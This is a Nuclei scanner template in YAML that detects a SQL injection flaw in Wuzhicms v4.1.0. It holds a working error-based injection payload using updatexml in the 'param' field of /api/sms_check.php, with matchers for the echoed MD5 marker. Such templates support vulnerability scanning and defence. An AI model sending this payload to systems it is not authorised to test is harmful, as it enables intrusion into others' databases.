nuclei-templates/vulnerabilities/other/wuzhicms-sqli.yaml

29 lines
563 B
YAML

id: wuzhicms-sqli
info:
name: Wuzhicms v4.1.0 SQL Injection
author: princechaddha
severity: high
reference:
- https://github.com/wuzhicms/wuzhicms/issues/184
tags: wuzhicms,sqli
variables:
num: "999999999"
requests:
- method: GET
path:
- "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5({{num}})),0x7e),1)--%20"
matchers-condition: and
matchers:
- type: word
words:
- '{{md5({{num}})}}'
part: body
- type: status
status:
- 200